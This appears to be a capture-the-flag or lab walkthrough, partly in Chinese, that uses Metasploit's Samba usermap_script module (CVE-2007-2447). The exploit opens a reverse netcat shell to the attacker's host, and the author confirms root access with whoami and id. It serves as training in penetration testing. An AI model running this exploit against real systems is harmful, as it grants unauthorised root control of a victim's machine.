ctf：kali2：渗透Samba：exploit/multi/samba/usermap_script

 search samba/usermap

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/samba/usermap_script

msf6 auxiliary(scanner/smb/smb_version) > info exploit/multi/samba/usermap_script

       Name: Samba "username map script" Command Execution
     Module: exploit/multi/samba/usermap_script
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2007-05-14

Provided by:
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT   139              yes       The target port (TCP)

Payload information:
  Space: 1024

Description:
  This module exploits a command execution vulnerability in Samba 
  versions 3.0.20 through 3.0.25rc3 when using the non-default 
  "username map script" configuration option. By specifying a username 
  containing shell meta characters, attackers can execute arbitrary 
  commands. No authentication is needed to exploit this vulnerability 
  since this option is used to map usernames prior to authentication!

References:
  https://nvd.nist.gov/vuln/detail/CVE-2007-2447
  OSVDB (34700)
  http://www.securityfocus.com/bid/23972
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
  http://samba.org/samba/security/CVE-2007-2447.html

View the full module info with the info -d command.

msf6 auxiliary(scanner/smb/smb_version) > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) >  set RHOSTS 192.168.3.54
RHOSTS => 192.168.3.54
msf6 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo IwmN37I0D3cTGJhv;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “IwmN37I0D3cTGJhv\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.6.103:4444 -> 192.168.3.54:34848) at 2014-07-16 10:00:59 +0800
从输出的信息中，可以看到成功的打开了一个会话。这表示已成功攻击了目标主机。此时用户可以执行一些Linux命令，查看目标主机的相关信息。如下所示：
whoami #查看当前登录系统的用户
root
从输出的信息中，可以看到当前目标系统登录的用户名是root。如果想了解该用户的详细信息，可以使用id命令查看。如下所示：
id #查看当前登录用户的信息
uid=0(root) gid=0(root)
输出的信息表上root用户属于root组，并且其UID和GID都为0。